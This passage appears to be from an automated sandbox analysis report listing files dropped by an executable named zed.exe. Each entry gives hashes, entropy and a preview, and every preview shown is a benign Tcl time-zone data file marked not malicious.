                                                                                                                                                                                                                                            SHA-512:07565071D05CF972DD64F6060599EB68A00BF264172873BA310168AD07CE0CFCF90D0019B775433EC910DA748B89F0C614E7FD4E821993DA53C7E33F194C6A97
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Vilnius) {.. {-9223372036854775808 6076 0 LMT}.. {-2840146876 5040 0 WMT}.. {-1672536240 5736 0 KMT}.. {-1585100136 3600 0 CET}.. {-1561251600 7200 0 EET}.. {-1553565600 3600 0 CET}.. {-928198800 10800 0 MSK}.. {-900126000 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-802141200 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {606870000 7200 0 EEMMTT}.. {606873600 10800 1 EEST}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2123
                                                                                                                                                                                                                                            Entropy (8bit):3.667144931158014
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:menvCAs6kKR6aQmF1cSNWJjXgV/Ap40FjDqR:mevCAs6kC6aZF1cSNcjXgV/ApDFjDqR
                                                                                                                                                                                                                                            MD5:53E5BA5747B3255BB049F6FF651CEE25
                                                                                                                                                                                                                                            SHA1:A69E2BFDB89AC8756E1CD2EAA9109ACD924A0850
                                                                                                                                                                                                                                            SHA-256:22968D40DAC2B669E6D2BC43ED6B16C8A9CA3E1F9DACBF8B246299C3C24CC397
                                                                                                                                                                                                                                            SHA-512:3269D20DF9C9DDFF8252F33ED563B118771FC71049542DA7C6678E0B5B75FFEA00845FA6F3BC26EDABB4BB7CE449B0B7E00B72473D8D95F126AB3893A9A969B4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Volgograd) {.. {-9223372036854775808 10660 0 LMT}.. {-1577761060 10800 0 +03}.. {-1247540400 14400 0 +04}.. {-256881600 14400 0 +05}.. {354916800 18000 1 +05}.. {370724400 14400 0 +04}.. {386452800 18000 1 +05}.. {402260400 14400 0 +04}.. {417988800 18000 1 +05}.. {433796400 14400 0 +04}.. {449611200 18000 1 +05}.. {465343200 14400 0 +04}.. {481068000 18000 1 +05}.. {496792800 14400 0 +04}.. {512517600 18000 1 +05}.. {528242400 14400 0 +04}.. {543967200 18000 1 +05}.. {559692000 14400 0 +04}.. {575416800 10800 0 +04}.. {575420400 14400 1 +04}.. {591145200 10800 0 +03}.. {606870000 14400 1 +04}.. {622594800 10800 0 +03}.. {638319600 14400 1 +04}.. {654649200 10800 0 +03}.. {670374000 14400 0 +04}.. {701820000 10800 0 +04}.. {701823600 14400 1 +04}.. {717548400 10800 0 +03}.. {733273200 14400 1 +04}.. {748998000 10800 0 +03}.. {
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8662
                                                                                                                                                                                                                                            Entropy (8bit):3.8187545871488995
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:ELn9M9Nivtctwwoy4qelPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCso:E6Nivtctgq1sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:992C1D268E336AF1FB8200966C111644
                                                                                                                                                                                                                                            SHA1:C893B82224C8EF282DB2E16A5BBCC3A21C49B6FE
                                                                                                                                                                                                                                            SHA-256:F9DC10EC2AE2CC810A6C08837059B34BE651900BA4E1CEDB93C209972CCFB5A2
                                                                                                                                                                                                                                            SHA-512:EC4E0D8684D57FA66144F11D8E8C80E5272D4A7304300FEBE20E236476C1B8B33BBC5E479BF96D9ED12900FE6D41DD1DC0D11CBE02B89E0C4C7A153B4BFBCB1F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Warsaw) {.. {-9223372036854775808 5040 0 LMT}.. {-2840145840 5040 0 WMT}.. {-1717032240 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618696800 7200 0 EET}.. {-1600473600 10800 1 EEST}.. {-1587168000 7200 0 EET}.. {-931734000 7200 0 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796870800 7200 0 CEST}.. {-796608000 3600 0 CET}.. {-778726800 7200 1 CEST}.. {-762660000 3600 0 CET}.. {-748486800 7200 1 CEST}.. {-733273200 3600 0 CET}.. {-715215600 7200 1 CEST}.. {-701910000 3600 0 CET}.. {-684975600 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-654130800 7200 1 CEST}.. {-639010800 3600 0 CET}.. {-397094400 7200 1 CEST}.. {-386812800 3600 0 CET}.. {-371088000 72
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):187
                                                                                                                                                                                                                                            Entropy (8bit):4.899266605519742
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/sUE2tovXHAIgoq8sUE2oAovRL/yQa5rXv1/h8Q0:SlSWB9vsM3ymhrE2tSHAIgohrE2LovNB
                                                                                                                                                                                                                                            MD5:B07D9D3A5B0D11A578F77995A5FBE12B
                                                                                                                                                                                                                                            SHA1:1C4E186F2D53C0A1E6A82A6D33B172E403A41D6D
                                                                                                                                                                                                                                            SHA-256:A49B3894EB84F003EB357647D6A40CEAF6213523196CC1EC24EEFD7D9D6D3C3E
                                                                                                                                                                                                                                            SHA-512:43520AE325980B236C47C866620D1DA200AC0CD794E8EB642D2936D4B0ECEFE2DA0A93C9559D08581B3CCE2BC75251A4D5B967D376B16EB0C042B0ADCE1DCD01
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Belgrade)]} {.. LoadTimeZoneFile Europe/Belgrade..}..set TZData(:Europe/Zagreb) $TZData(:Europe/Belgrade)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                                                            Entropy (8bit):4.999265802825238
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV2cvXHAIgoq1csFARL/yQa58KXkcAEfh8Qaocqn:SlSWB9vsM3ym5HAIgoiAN/yjzVbh8C
                                                                                                                                                                                                                                            MD5:5B150E25521FE5DD8B83DD9B1B8F3A7A
                                                                                                                                                                                                                                            SHA1:0BB6F73F2C4B2464F3B1E62138843389AF1A07BC
                                                                                                                                                                                                                                            SHA-256:EF928AC09B9A366FD015F488B6A19FEFD72DE1BAF34E5CADFB8334946BCF19FE
                                                                                                                                                                                                                                            SHA-512:4A85A4E929EC6FE66AE60899FA55A75156D075CB2FE41C19337A128F5FA7363B9208AC2DC1BF4E44B76D5F115143D73F6D923E255EA78538D1BE4E45DEBA2049
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Kyiv)]} {.. LoadTimeZoneFile Europe/Kyiv..}..set TZData(:Europe/Zaporozhye) $TZData(:Europe/Kyiv)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7305
                                                                                                                                                                                                                                            Entropy (8bit):3.8199799674700277
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:94hH74elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxOrnW+:9Y41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:EBD66FAEA63E1B90122CC1EB21634ECE
                                                                                                                                                                                                                                            SHA1:C6487BB8AB2A6A72B2170B220F383ADB6B9AC91C
                                                                                                                                                                                                                                            SHA-256:95AFA61E439CA38551306D8FDB11C2788D935C42768D0407C9E4337F105A3E93
                                                                                                                                                                                                                                            SHA-512:25A8D0ED9BBE6BF23A1A76CC6D5378CF4D50544AA22DA97DDCD0673D7A5CCFEFFD81B660A1AEFB254B8BBEA55F6EF734BBBD3F0CB903E0721BE107667CA1E328
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Zurich) {.. {-9223372036854775808 2048 0 LMT}.. {-3675198848 1786 0 BMT}.. {-2385246586 3600 0 CET}.. {-904435200 7200 1 CEST}.. {-891129600 3600 0 CET}.. {-872985600 7200 1 CEST}.. {-859680000 3600 0 CET}.. {347151600 3600 0 CET}.. {354675600 7200 1 CEST}.. {370400400 3600 0 CET}.. {386125200 7200 1 CEST}.. {401850000 3600 0 CET}.. {417574800 7200 1 CEST}.. {433299600 3600 0 CET}.. {449024400 7200 1 CEST}.. {465354000 3600 0 CET}.. {481078800 7200 1 CEST}.. {496803600 3600 0 CET}.. {512528400 7200 1 CEST}.. {528253200 3600 0 CET}.. {543978000 7200 1 CEST}.. {559702800 3600 0 CET}.. {575427600 7200 1 CEST}.. {591152400 3600 0 CET}.. {606877200 7200 1 CEST}.. {622602000 3600 0 CET}.. {638326800 7200 1 CEST}.. {654656400 3600 0 CET}.. {670381200 7200 1 CEST}.. {686106000 3600 0 CET}.. {701830800 7200 1 CEST}.. {717555600 3600 0
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):170
                                                                                                                                                                                                                                            Entropy (8bit):4.8978035005721265
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/wox6QavKL81n:SlSWB9vsM3ymvKA2PHAIgovKAH6N/wRj
                                                                                                                                                                                                                                            MD5:68667037110E713DB3F51922DDE929FE
                                                                                                                                                                                                                                            SHA1:2EB02BE3FD35F105B59847892A78F1AA21754541
                                                                                                                                                                                                                                            SHA-256:E20D829C605A7C5B2A96B83C3480DF28C964A13381A8BD2C72C2A37295131FA7
                                                                                                                                                                                                                                            SHA-512:3A8CC2EC9E3053283F996CA2C4B422061D47F1D16CA07985CBA2C838DF322C23CC9DD28033646F22EAE0E401781480B9D3AF82A539444166A4DD9B7BCCAE45FE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:GB) $TZData(:Europe/London)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):175
                                                                                                                                                                                                                                            Entropy (8bit):4.90874180513438
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/w4b/h8QavKL81n:SlSWB9vsM3ymvKA2PHAIgovKAH6N/w4E
                                                                                                                                                                                                                                            MD5:625520BAAB774520AC54BFB9EDCF9FCA
                                                                                                                                                                                                                                            SHA1:C72F0FD45F448901C6B2E24243175729591B9A54
                                                                                                                                                                                                                                            SHA-256:C9334480D0A970254B6BA6FF22E958DC8DD8BF06288229461A551C7C094C3F1D
                                                                                                                                                                                                                                            SHA-512:1B672218FF9C86168E065A98C3B5F67DAB710D1C2A319E9D6599B397C4B4C00D3721B76C735C8AB04BCB618C1832B07F6CCDAF4266CC0D12A461A3A862D1AEB2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:GB-Eire) $TZData(:Europe/London)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                                                            Entropy (8bit):4.867609984313873
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/wZ8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/wZ8RQy
                                                                                                                                                                                                                                            MD5:A01FE6FC260711F0E11C85DC3DE3550A
                                                                                                                                                                                                                                            SHA1:988311B71498591425C63669DC3F802F270B2C44
                                                                                                                                                                                                                                            SHA-256:747C15CDC239855D5380B7A7F47112F2A26C61B0BF300EEB9711E6521550D189
                                                                                                                                                                                                                                            SHA-512:BE4678DCBAE5DBC72865665413206C1909F28BA54F4943257870EFFBA6525457866DED7A985E89F2689C810B314DE4AA2FA3A0A1826A664727F5F7113AA56595
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:GMT) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):155
                                                                                                                                                                                                                                            Entropy (8bit):4.917182390229381
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/we7/8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/wI8RQy
                                                                                                                                                                                                                                            MD5:3327B1BF3118AC6AFC02C31DF5B67CD9
                                                                                                                                                                                                                                            SHA1:3932577E66801AD31519B0BB56CCE7B9E36221A9
                                                                                                                                                                                                                                            SHA-256:BE48462CCFBB3AEE19597F082A17C2C5D2FD8BB1C9122245EFAB0A51F8F413B0
                                                                                                                                                                                                                                            SHA-512:53866FD513B039E8203E51FF3434D5736D3A4C4E0A46874D1C99A17115181AF749F0D079C2E14C5B0538D3DFA52B1645C977CD6599DA3EDA57CC7F84EEAB2D06
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:GMT+0) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):155
                                                                                                                                                                                                                                            Entropy (8bit):4.904279164422928
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/w4Hp8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/w4J8RQy
                                                                                                                                                                                                                                            MD5:0CFFC5655F031D954BD623CC4C74DC9C
                                                                                                                                                                                                                                            SHA1:CE5E7AD67252F52D7E70719725FF5BE393DD6EF0
                                                                                                                                                                                                                                            SHA-256:944C86F516141DDC3AEC1AE4A963E9769879C48ED12DADDF4ED63A01313ACD00
                                                                                                                                                                                                                                            SHA-512:C7352D1394E8B8AC90CD19EE753D5277259BE5512ADDCAED2A2DEF144762CF20BE7A9FA09AAA1829EE401DD195C2AED8C967A7FF46739236E042AF4298EC84A2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:GMT-0) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):154
                                                                                                                                                                                                                                            Entropy (8bit):4.892526720357546
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/wPHp8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/wvp8RQy
                                                                                                                                                                                                                                            MD5:565B41A5DB28F9FE7D220E9BA39062A4
                                                                                                                                                                                                                                            SHA1:5183689210F07C8A71F880DCE8E5C2CB62CEB17D
                                                                                                                                                                                                                                            SHA-256:54850A5F488205DB01FBB46E2DA9FFF951C4571029EA64D35932DDEA5346DAAF
                                                                                                                                                                                                                                            SHA-512:BD6E5141F06B03D62DCF725E9E48D6AA8ECD6E8E47A4015B25DC3F672392065FFFD80D688C6695324DC105EA528025CF447FA77E6D17E15D438E61DC51879CB7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:GMT0) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):159
                                                                                                                                                                                                                                            Entropy (8bit):4.917976058206477
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/wE+FB5yRDMovn:SlSWB9vsM3yFXHAIgnvVHN/wE6BURQy
                                                                                                                                                                                                                                            MD5:443FA76F107ED438F9571A044B848C6A
                                                                                                                                                                                                                                            SHA1:1CF508429DFC40643B1FAB336A249A3A287D8C7C
                                                                                                                                                                                                                                            SHA-256:9E7A8DAA26CE36E8F7D7F13460915C063EE98E2A4DB276AD9D15CA5C7C06815F
                                                                                                                                                                                                                                            SHA-512:6C0C5FF513A742FBDA349AC3A2581D456701B5348A54ECF38E496DAA1EFC74D937982B6F69F1761CC2FC4B88D9A971EFA2B16096E71EAF002EC5CE4130B533DE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:Greenwich) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):111
                                                                                                                                                                                                                                            Entropy (8bit):4.90682088010982
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x//LhdNMXGm2OH1V90v:SlSWB9eg/jJDm2OH1VGv
                                                                                                                                                                                                                                            MD5:79C82A5F8B034E71D0582371E3218DBB
                                                                                                                                                                                                                                            SHA1:1476CE8EA223095094B6D25D171E6319C96669F4
                                                                                                                                                                                                                                            SHA-256:8D710699AF319E0DDB83E9F3A32D07AE8082EA2F7EABBD345EFFFFB0F563062E
                                                                                                                                                                                                                                            SHA-512:ADEE55581D1A158929F09A63B03883ABE9193337DDF225C61AFDBB8A2C7D0BD248ADC4714E0EEFD334826C54C1AFFC8B1E6C2B0D6EF830C3CCA50CC79834F473
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:HST) {.. {-9223372036854775808 -36000 0 HST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                                                            Entropy (8bit):4.913328649996328
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8Li0vXHAIgN2qfvRL//XF1p4WFKQyvn:SlSWB9vsM3yW2HAIgAOvN///p4wKlvn
                                                                                                                                                                                                                                            MD5:6A307B229C302B1BAE783C8143809269
                                                                                                                                                                                                                                            SHA1:EA169AF81AD12380A69FB6B7A12479BA8B82878B
                                                                                                                                                                                                                                            SHA-256:359C9C02A9FA3DE10BA48FA0AB47D8D7AFF3B47F950CFAF5EB68F842EA52AB21
                                                                                                                                                                                                                                            SHA-512:505445FD0B3E140384EDC27993923BBF9ACD23A244B0F14D58804BFAA946D0BC4C0D301FBCCB492BAFDA42C8A92F4163FB96F4D75DD7374858D1C66183BEC24B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Hong_Kong)]} {.. LoadTimeZoneFile Asia/Hong_Kong..}..set TZData(:Hongkong) $TZData(:Asia/Hong_Kong)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):178
                                                                                                                                                                                                                                            Entropy (8bit):4.853280551555672
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/+GAKyx/2DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/+XZx+D4
                                                                                                                                                                                                                                            MD5:710D3A32EA8EAD11B45D4911DA8F2676
                                                                                                                                                                                                                                            SHA1:146D2A6D48940E58567EFA3BCA134D195E4649E6
                                                                                                                                                                                                                                            SHA-256:8A531293F672D8FE38996989FC4EEB22B5EFE6E046E2F58E94D01DA9CE56EF68
                                                                                                                                                                                                                                            SHA-512:70432973549C1A83036E0658AEE81C883F19D0D631E35F4C70F2EC69C9384E99340004618EF8B414D8EA9090C6C3120CF46A5D9ABDE4113917995B2844337988
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Iceland) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.807410166086502
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/+L6EL/liEi2eDcVVMB:SlSWB9vsM3y7VTHAIgNTxcAN/+LzM2eV
                                                                                                                                                                                                                                            MD5:0F20CBF1F7600D05F85D4D90FDAB2465
                                                                                                                                                                                                                                            SHA1:2F3C9479C4F4CD7999B19C07359B89A5FB1B9839
                                                                                                                                                                                                                                            SHA-256:1B1177CE4D59D7CBCAE9B0421EB00AD341ECB299BD15773D4ED077F0F2CE7B38
                                                                                                                                                                                                                                            SHA-512:657341FC2CCD6A4F7B405ABC8E24C651F6FFEFD68EBD6E2086ADF44834DCBF21D1B9D414436E42C8DCE46FFB88116B98C1D073782E214B3996D49EC00DFF4383
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Indian/Antananarivo) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):180
                                                                                                                                                                                                                                            Entropy (8bit):4.853088038233057
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/+L6EL9WJx3vFNMXGm2OHi/FvoHscfJ7XH0VQVFV6VVFSTVV:SlSWB9eg/+LxWJxPDm2OHqFvoH9+VQV3
                                                                                                                                                                                                                                            MD5:06143C3DFD86B3FE4F2A3060C0E05BB6
                                                                                                                                                                                                                                            SHA1:88E0E30CEE4AB8117860A35AD03B16AF48988789
                                                                                                                                                                                                                                            SHA-256:11044AD7CB0848CC734D2A67128AA6AC07CB89268399AA0A71A99024DE4B8879
                                                                                                                                                                                                                                            SHA-512:79195D3D0D475BEA982F40683D4BA14AC33B3FA91311F513DCED955C9297C2B0F12D94CCA930FAE0FB7F95DB34CD4E74B5AF0233E792122646592B7EFF0F3163
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Indian/Chagos) {.. {-9223372036854775808 17380 0 LMT}.. {-1988167780 18000 0 +05}.. {820436400 21600 0 +06}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):181
                                                                                                                                                                                                                                            Entropy (8bit):4.910217468889087
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8VLYO5YFfXHAIgN8ELYOJARL/+L6EL9FBIEWoxp4Wx:SlSWB9vsM3y1LePHAIgKELtAN/+LxpWg
                                                                                                                                                                                                                                            MD5:39CB9E58C0086B80FB12AC10A6D371E2
                                                                                                                                                                                                                                            SHA1:2A9A5CCA411779615A62D9E82023B6A066CB3CF3
                                                                                                                                                                                                                                            SHA-256:78A208B73426A1B6D7CF2FE89A0EF3F01721F877D569BC43F2E5B6625A947299
                                                                                                                                                                                                                                            SHA-512:BB6C8CF2B6AF9F93A7F7382A453261FA43E6E42E9ED1223F25A70DAD2ABBBF2F5777288553F4BC0155944754655D2C3F81BD81E5B1F611C4B2CCDB729B67AAC5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Bangkok)]} {.. LoadTimeZoneFile Asia/Bangkok..}..set TZData(:Indian/Christmas) $TZData(:Asia/Bangkok)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):174
                                                                                                                                                                                                                                            Entropy (8bit):4.818886812441817
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8nv3vXHAIgNnDA6RL/+L6EL9dEh4WFKsyn:SlSWB9vsM3yHvPHAIg15N/+Lxah4wKsy
                                                                                                                                                                                                                                            MD5:9462E9CFC88C3DA3CCCDA18C92E49A97
                                                                                                                                                                                                                                            SHA1:B50C82C6C7361BD6F028F82E2FEAF8486D798137
